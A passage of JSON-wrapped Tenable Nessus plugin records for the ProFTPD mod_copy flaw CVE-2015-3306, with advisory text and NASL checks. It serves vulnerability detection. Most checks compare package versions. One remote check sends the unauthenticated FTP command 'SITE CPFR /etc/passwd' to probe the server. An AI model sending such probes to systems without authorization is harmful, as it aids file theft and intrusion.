"DEBIAN_DSA-3263.NASL", "href": "https://www.tenable.com/plugins/nessus/83546", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3263. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83546);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3306\");\n script_bugtraq_id(74238);\n script_xref(name:\"DSA\", value:\"3263\");\n\n script_name(english:\"Debian DSA-3263-1 : proftpd-dfsg - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vadim Melihow discovered that in proftpd-dfsg, an FTP server, the\nmod_copy module allowed unauthenticated users to copy files around on\nthe server, and possibly to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=782781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/proftpd-dfsg\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/proftpd-dfsg\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3263\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the proftpd-dfsg packages.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.3.4a-5+deb7u3.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 
1.3.5-1.1+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:proftpd-dfsg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-basic\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-dev\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-doc\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-mod-ldap\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-mod-mysql\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-mod-odbc\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-mod-pgsql\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"proftpd-mod-sqlite\", reference:\"1.3.4a-5+deb7u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-basic\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-dev\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-doc\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-mod-geoip\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-mod-ldap\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-mod-mysql\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif 
(deb_check(release:\"8.0\", prefix:\"proftpd-mod-odbc\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-mod-pgsql\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"proftpd-mod-sqlite\", reference:\"1.3.5-1.1+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:46:42", "description": "Vadim Melihow reported a critical issue with proftpd installations that use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands to be used by unauthenticated clients\n\nUpstream report: http://bugs.proftpd.org/show_bug.cgi?id=4169\n\nNote that mod_copy is not loaded/enabled by default in the Fedora package.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-04T00:00:00", "type": "nessus", "title": "Fedora 22 : proftpd-1.3.5-6.fc22 (2015-7164)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:proftpd", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-7164.NASL", "href": "https://www.tenable.com/plugins/nessus/83224", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-7164.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83224);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3306\");\n script_xref(name:\"FEDORA\", value:\"2015-7164\");\n\n script_name(english:\"Fedora 22 : proftpd-1.3.5-6.fc22 (2015-7164)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vadim Melihow reported a critical issue with proftpd installations\nthat use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy\nallows these commands to be used by unauthenticated clients\n\nUpstream report: http://bugs.proftpd.org/show_bug.cgi?id=4169\n\nNote that mod_copy is not loaded/enabled by default in the Fedora\npackage.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.proftpd.org/show_bug.cgi?id=4169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1212386\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?25c5c14c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected proftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", 
\"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"proftpd-1.3.5-6.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"proftpd\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:47:08", "description": "Vadim Melihow reported a critical issue with proftpd installations that use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands to be used by *unauthenticated clients*\n\nUpstream report: http://bugs.proftpd.org/show_bug.cgi?id=4169\n\nThis update contains a backported fix for this issue.\n\nNote that mod_copy is not loaded/enabled by default in the Fedora package.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-04T00:00:00", "type": "nessus", "title": "Fedora 20 : proftpd-1.3.4e-3.fc20 (2015-6401)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:proftpd", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2015-6401.NASL", "href": "https://www.tenable.com/plugins/nessus/83198", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-6401.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83198);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3306\");\n script_xref(name:\"FEDORA\", value:\"2015-6401\");\n\n script_name(english:\"Fedora 20 : proftpd-1.3.4e-3.fc20 (2015-6401)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vadim Melihow reported a critical issue with proftpd installations\nthat use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy\nallows these commands to be used by *unauthenticated clients*\n\nUpstream report: http://bugs.proftpd.org/show_bug.cgi?id=4169\n\nThis update contains a backported fix for this issue.\n\nNote that mod_copy is not loaded/enabled by default in the Fedora\npackage.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.proftpd.org/show_bug.cgi?id=4169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1212386\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3fb4bf19\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected proftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", 
\"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"proftpd-1.3.4e-3.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"proftpd\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:48:42", "description": "The remote host is running a version of ProFTPD that is affected by an information disclosure vulnerability in the mod_copy module due to the SITE CPFR and SITE CPTO commands being available to unauthenticated clients. 
An unauthenticated, remote attacker can exploit this flaw to read and write to arbitrary files on any web accessible path on the host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-06-16T00:00:00", "type": "nessus", "title": "ProFTPD mod_copy Information Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2020-03-27T00:00:00", "cpe": ["cpe:/a:proftpd:proftpd"], "id": "PROFTPD_1_3_5_INFO_DISC.NASL", "href": "https://www.tenable.com/plugins/nessus/84215", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84215);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/27\");\n\n script_cve_id(\"CVE-2015-3306\");\n script_bugtraq_id(74238);\n script_xref(name:\"EDB-ID\", value:\"36742\");\n script_xref(name:\"EDB-ID\", value:\"36803\");\n\n script_name(english:\"ProFTPD mod_copy Information Disclosure\");\n script_summary(english:\"Checks if SITE CPFR command is available without authentication.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a ProFTPD module that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of ProFTPD that is affected by an\ninformation disclosure vulnerability in the mod_copy module due to the\nSITE CPFR and SITE CPTO commands being available to unauthenticated\nclients. 
An unauthenticated, remote attacker can exploit this flaw to\nread and write to arbitrary files on any web accessible path on the\nhost.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.proftpd.org/show_bug.cgi?id=4169\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3306\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:proftpd:proftpd\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FTP\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_anonymous.nasl\");\n script_require_keys(\"ftp/proftpd\");\n script_require_ports(\"Services/ftp\", 21);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"ftp/proftpd\");\n\n# Connect to the FTP server\nport = get_ftp_port(default: 21, broken:TRUE);\n\nsoc = open_sock_tcp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL, port);\n\nftp_debug(str:\"custom banner\");\nr = ftp_recv_line(socket:soc);\nif (isnull(r)) audit(AUDIT_RESP_NOT, port);\n\nc = 'SITE CPFR /etc/passwd \\r\\n';\nsend(socket:soc, data:c);\nb = recv(socket:soc, length:3);\n\nftp_close(socket: soc);\n\nif(b == \"350\")\n{\n if (report_verbosity > 0) security_hole(port:port, extra:'\\nNessus received a 350 response from sending the following unauthenticated request :\\n\\nSITE CPFR /etc/passwd\\n');\n else security_hole(port);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, 'ProFTPD', port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:48:44", "description": "The ftp server ProFTPD was updated to 1.3.5a to fix one security issue.\n\nThe following vulnerability was fixed :\n\n - CVE-2015-3306: Unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy (boo#927290)\n\nIn addition, proftpd was updated to 1.3.5a to fix a number of upstream bugs and improve functionality.", "cvss3": {"score": null, "vector": null}, "published": "2015-06-12T00:00:00", "type": "nessus", "title": "openSUSE Security Update : proftpd (openSUSE-2015-410)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4359", "CVE-2015-3306"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:proftpd", "p-cpe:/a:novell:opensuse:proftpd-debuginfo", "p-cpe:/a:novell:opensuse:proftpd-debugsource", 
"p-cpe:/a:novell:opensuse:proftpd-devel", "p-cpe:/a:novell:opensuse:proftpd-lang", "p-cpe:/a:novell:opensuse:proftpd-ldap", "p-cpe:/a:novell:opensuse:proftpd-ldap-debuginfo", "p-cpe:/a:novell:opensuse:proftpd-mysql", "p-cpe:/a:novell:opensuse:proftpd-mysql-debuginfo", "p-cpe:/a:novell:opensuse:proftpd-pgsql", "p-cpe:/a:novell:opensuse:proftpd-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:proftpd-radius", "p-cpe:/a:novell:opensuse:proftpd-radius-debuginfo", "p-cpe:/a:novell:opensuse:proftpd-sqlite", "p-cpe:/a:novell:opensuse:proftpd-sqlite-debuginfo", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-410.NASL", "href": "https://www.tenable.com/plugins/nessus/84134", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-410.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84134);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-4359\", \"CVE-2015-3306\");\n\n script_name(english:\"openSUSE Security Update : proftpd (openSUSE-2015-410)\");\n script_summary(english:\"Check for the openSUSE-2015-410 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The ftp server ProFTPD was updated to 1.3.5a to fix one security\nissue.\n\nThe following vulnerability was fixed :\n\n - CVE-2015-3306: Unauthenticated copying of files via SITE\n CPFR/CPTO allowed by mod_copy (boo#927290)\n\nIn addition, proftpd was updated to 1.3.5a to fix a number of upstream\nbugs and improve functionality.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=927290\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected proftpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-radius\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-radius-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:proftpd-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"proftpd-debuginfo-1.3.5a-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 
